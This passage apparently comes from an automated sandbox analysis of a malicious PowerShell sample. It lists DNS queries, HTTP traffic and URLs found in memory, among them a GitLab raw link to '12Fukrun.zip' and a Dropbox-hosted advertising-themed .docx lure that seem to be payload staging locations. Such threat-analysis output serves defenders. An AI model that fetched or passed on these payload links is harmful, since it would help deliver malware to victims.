; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
              Source: global trafficDNS traffic detected: DNS query: ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com
              Source: global trafficDNS traffic detected: DNS query: gitlab.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Nov 2024 08:56:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8200Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edge-block-www-env.dropbox-dns.com
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gitlab.com
              Source: powershell.exe, 0000000C.00000002.2201398911.000001F3901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2201398911.000001F390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F3819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E96A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E9562000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.0000024405A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000010.00000002.2357881268.00000244042E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254D94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.00000244040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www-env.dropbox-dns.com
              Source: powershell.exe, 00000010.00000002.2357881268.00000244042E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.dropbox.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://a.sprig.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://accounts.google.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://accounts.google.com/gsi/client
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254D94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.00000244040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.login.yahoo.com/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://app.hellofax.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://app.hellosign.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://canny.io/sdk.js
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cfl.dropboxstatic.com/static/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
              Source: powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://customers.gitlab.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dl-web.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/fsip/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/fsip/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/spreadsheets/fsip/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.sandbox.google.com/document/fsip/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docsend.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://experience.dropbox.com/
              Source: powershell.exe, 00000010.00000002.2357881268.00000244042E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com(
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/-/sandbox/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/-/sandbox/;
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/-/speedscope/index.html
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/admin/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/assets/
              Source: powershell.exe, 0000000E.00000002.2257395123.00000254D7579000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2324464767.00000254F1549000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2326723218.00000254F179D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327742762.00000254F1819000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip
              Source: powershell.exe, 0000000E.00000002.2326636099.00000254F1690000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/bosse21/mkt/-/raw/main/12fukrun.zip
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/users/sign_in
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F380C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DA123000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.0000024404CE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://help.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://login.yahoo.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://navi.dropbox.jp/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://new-sentry.gitlab.net
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
              Source: powershell.exe, 0000000C.00000002.2201398911.000001F3901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2201398911.000001F390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F3819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E96A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E9562000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.0000024405A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://officeapps-df.live.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://officeapps.live.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/picker
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pal-test.adyen.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paper.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://photos.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sales.dropboxbusiness.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sentry.gitlab.net
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://showcase.dropbox.com/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://snowplow.trx.gitlab.net
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sourcegraph.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com/cd/0/get/CelT5aTdmoNoeQaou8KCBWvfzViG
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.docsend.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F38162C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/page_success/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/pithos/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/playlist/
              Source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1460000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?
              Source: powershell.exe, 0000000C.00000002.2211751712.000001F3F1640000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_advertising_campaign_and_collaboration.docx?
              Source: powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/scl/fi/8wcdoh5jl9xyp5
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/service_worker.js
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/static/api/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/static/serviceworker/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/v/s/playlist/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropboxstatic.com/static/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/ns.html
